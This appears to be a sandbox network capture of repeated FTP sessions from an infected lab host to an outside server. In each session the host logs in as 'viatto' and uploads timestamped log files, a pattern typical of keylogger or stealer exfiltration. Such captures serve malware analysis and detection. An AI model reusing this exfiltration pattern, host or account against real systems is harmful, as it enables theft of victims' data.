                                                                                                                                    Oct 10, 2022 06:03:22.429430962 CEST2149965185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:22.429596901 CEST4996521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:22.452476025 CEST2149965185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:22.452750921 CEST4996521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:22.475697041 CEST2149965185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:22.476151943 CEST4996521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:22.499347925 CEST2149965185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:22.499890089 CEST4996521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:22.523119926 CEST2149965185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:22.524233103 CEST4996521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:22.547245979 CEST2149965185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:22.549375057 CEST4996521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:22.572660923 CEST2149965185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,155)
                                                                                                                                    Oct 10, 2022 06:03:22.596682072 CEST4996521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.13.txt
                                                                                                                                    Oct 10, 2022 06:03:22.620729923 CEST2149965185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:22.644881964 CEST2149965185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:22.851182938 CEST2149967185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:22.851449013 CEST2149967185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:22.851577997 CEST2149967185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:22.851713896 CEST4996721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:22.876883030 CEST2149967185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:22.877226114 CEST4996721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:22.902735949 CEST2149967185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:22.903103113 CEST4996721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:22.929188967 CEST2149967185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:22.929522038 CEST4996721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:22.955235004 CEST2149967185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:22.956274033 CEST4996721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:22.980508089 CEST2149967185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:22.981672049 CEST4996721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:23.010521889 CEST2149967185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,156)
                                                                                                                                    Oct 10, 2022 06:03:23.042387962 CEST4996721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.14.txt
                                                                                                                                    Oct 10, 2022 06:03:23.107868910 CEST2149967185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:23.140248060 CEST2149967185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:23.341849089 CEST2149969185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:23.341934919 CEST2149969185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:23.342231989 CEST2149969185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:23.559374094 CEST4996921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:23.586076975 CEST2149969185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:23.629165888 CEST4996921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:23.657260895 CEST2149969185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:23.703775883 CEST4996921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:23.729235888 CEST2149969185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:23.730823994 CEST4996921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:23.758084059 CEST2149969185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:23.760430098 CEST4996921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:23.786113977 CEST2149969185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:23.819411993 CEST4996921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:23.845802069 CEST2149969185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,158)
                                                                                                                                    Oct 10, 2022 06:03:23.902942896 CEST4996921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.15.txt
                                                                                                                                    Oct 10, 2022 06:03:23.928951025 CEST2149969185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:23.957230091 CEST2149969185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:24.220746994 CEST2149971185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:24.221683025 CEST2149971185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:24.222358942 CEST2149971185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:24.232815027 CEST4997121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:24.256970882 CEST2149971185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:24.259308100 CEST4997121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:24.283981085 CEST2149971185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:24.285959959 CEST4997121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:24.312901974 CEST2149971185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:24.770590067 CEST4997121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:24.795586109 CEST2149971185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:24.829042912 CEST4997121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:24.853918076 CEST2149971185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:24.855700016 CEST4997121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:24.880409002 CEST2149971185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,159)
                                                                                                                                    Oct 10, 2022 06:03:24.940987110 CEST4997121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.16.txt
                                                                                                                                    Oct 10, 2022 06:03:24.966444016 CEST2149971185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:24.997550964 CEST2149971185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:25.357455969 CEST2149973185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:25.357522011 CEST2149973185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:25.357554913 CEST2149973185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:25.418010950 CEST4997321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:25.443339109 CEST2149973185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:26.207866907 CEST4997321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:26.233076096 CEST2149973185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:26.286676884 CEST4997321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:26.314212084 CEST2149973185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:26.317600965 CEST4997321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:26.345472097 CEST2149973185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:26.346666098 CEST4997321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:26.373194933 CEST2149973185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:26.375294924 CEST4997321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:26.401375055 CEST2149973185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,161)
                                                                                                                                    Oct 10, 2022 06:03:26.424936056 CEST4997321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.17.txt
                                                                                                                                    Oct 10, 2022 06:03:26.452024937 CEST2149973185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:26.477258921 CEST2149973185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:26.670505047 CEST2149975185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:26.670559883 CEST2149975185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:26.670589924 CEST2149975185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:26.670968056 CEST4997521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:26.694307089 CEST2149975185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:26.694798946 CEST4997521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:26.718581915 CEST2149975185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:26.719007015 CEST4997521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:26.742371082 CEST2149975185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:26.742863894 CEST4997521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:26.766406059 CEST2149975185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:26.767862082 CEST4997521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:26.791060925 CEST2149975185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:26.793870926 CEST4997521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:26.817562103 CEST2149975185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,162)
                                                                                                                                    Oct 10, 2022 06:03:26.842428923 CEST4997521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.18.txt
                                                                                                                                    Oct 10, 2022 06:03:26.866976976 CEST2149975185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:26.891618967 CEST2149975185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:27.093449116 CEST2149977185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:27.093477964 CEST2149977185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:27.093494892 CEST2149977185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:27.093898058 CEST4997721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:27.118732929 CEST2149977185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:27.119225979 CEST4997721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:27.144547939 CEST2149977185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:27.144942999 CEST4997721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:27.171174049 CEST2149977185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:27.171497107 CEST4997721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:27.197722912 CEST2149977185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:27.198394060 CEST4997721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:27.223479033 CEST2149977185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:27.225058079 CEST4997721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:27.251276016 CEST2149977185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,163)
                                                                                                                                    Oct 10, 2022 06:03:27.275631905 CEST4997721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.19.txt
                                                                                                                                    Oct 10, 2022 06:03:27.301757097 CEST2149977185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:27.330579996 CEST2149977185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:27.524452925 CEST2149979185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:27.524494886 CEST2149979185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:27.524523973 CEST2149979185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:27.524946928 CEST4997921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:27.547682047 CEST2149979185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:27.548260927 CEST4997921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:27.570975065 CEST2149979185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:27.571702957 CEST4997921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:27.594568968 CEST2149979185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:27.597465992 CEST4997921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:27.620841026 CEST2149979185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:27.621778011 CEST4997921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:27.644645929 CEST2149979185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:27.647558928 CEST4997921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:27.671118021 CEST2149979185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,164)
                                                                                                                                    Oct 10, 2022 06:03:27.696753025 CEST4997921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.20.txt
                                                                                                                                    Oct 10, 2022 06:03:27.720038891 CEST2149979185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:27.744437933 CEST2149979185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:27.935375929 CEST2149981185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:27.935491085 CEST2149981185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:27.935543060 CEST2149981185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:27.936119080 CEST4998121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:27.959975958 CEST2149981185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:27.960380077 CEST4998121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:27.983946085 CEST2149981185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:27.984401941 CEST4998121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:28.008661032 CEST2149981185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:28.009202003 CEST4998121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:28.033431053 CEST2149981185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:28.033993006 CEST4998121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:28.058278084 CEST2149981185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:28.059365988 CEST4998121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:28.083292007 CEST2149981185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,165)
                                                                                                                                    Oct 10, 2022 06:03:28.108174086 CEST4998121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.21.txt
                                                                                                                                    Oct 10, 2022 06:03:28.134465933 CEST2149981185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:28.159775019 CEST2149981185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:28.342803955 CEST2149983185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:28.342866898 CEST2149983185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:28.343038082 CEST2149983185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:28.344149113 CEST4998321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:28.370106936 CEST2149983185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:28.370412111 CEST4998321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:28.396414042 CEST2149983185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:28.396900892 CEST4998321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:28.424839973 CEST2149983185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:28.427968025 CEST4998321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:28.455564976 CEST2149983185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:28.461968899 CEST4998321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:28.490115881 CEST2149983185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:28.492075920 CEST4998321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:28.521893978 CEST2149983185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,166)
                                                                                                                                    Oct 10, 2022 06:03:28.547952890 CEST4998321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.22.txt
                                                                                                                                    Oct 10, 2022 06:03:28.575576067 CEST2149983185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:28.601891041 CEST2149983185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:28.812556982 CEST2149985185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:28.812602997 CEST2149985185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:28.812741995 CEST2149985185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:28.812947989 CEST4998521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:28.835983992 CEST2149985185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:28.836281061 CEST4998521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:28.859397888 CEST2149985185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:28.859927893 CEST4998521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:28.883194923 CEST2149985185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:28.884392023 CEST4998521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:28.907846928 CEST2149985185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:28.908351898 CEST4998521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:28.931488037 CEST2149985185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:28.932569981 CEST4998521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:28.956077099 CEST2149985185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,168)
                                                                                                                                    Oct 10, 2022 06:03:28.979728937 CEST4998521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.23.txt
                                                                                                                                    Oct 10, 2022 06:03:29.003494024 CEST2149985185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:29.035202026 CEST2149985185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:32.220361948 CEST2149987185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:32.220407009 CEST2149987185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:32.220473051 CEST2149987185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:32.220689058 CEST4998721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:32.243594885 CEST2149987185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:32.243906975 CEST4998721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:32.266870975 CEST2149987185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:32.267235041 CEST4998721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:32.290837049 CEST2149987185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:32.294394970 CEST4998721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:32.317862034 CEST2149987185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:32.325963974 CEST4998721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:32.348856926 CEST2149987185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:32.349960089 CEST4998721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:32.373281002 CEST2149987185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,170)
                                                                                                                                    Oct 10, 2022 06:03:32.396872044 CEST4998721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.24.txt
                                                                                                                                    Oct 10, 2022 06:03:32.420360088 CEST2149987185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:32.445130110 CEST2149987185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:32.641608000 CEST2149989185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:32.641633034 CEST2149989185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:32.641927004 CEST2149989185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:32.644483089 CEST4998921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:32.667464018 CEST2149989185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:32.667867899 CEST4998921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:32.690964937 CEST2149989185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:32.692058086 CEST4998921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:32.715017080 CEST2149989185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:32.717782021 CEST4998921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:32.741127968 CEST2149989185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:32.741941929 CEST4998921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:32.764710903 CEST2149989185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:32.765980959 CEST4998921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:32.789433002 CEST2149989185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,172)
                                                                                                                                    Oct 10, 2022 06:03:32.815824032 CEST4998921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.25.txt
                                                                                                                                    Oct 10, 2022 06:03:32.840042114 CEST2149989185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:32.866146088 CEST2149989185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:33.078115940 CEST2149991185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:33.078155994 CEST2149991185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:33.078217030 CEST2149991185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:33.086847067 CEST4999121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:33.111102104 CEST2149991185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:33.111371040 CEST4999121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:33.135073900 CEST2149991185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:33.135355949 CEST4999121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:33.159833908 CEST2149991185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:33.165826082 CEST4999121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:33.190541029 CEST2149991185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:33.194217920 CEST4999121192.168.2.3185.106.92.60TYPE I
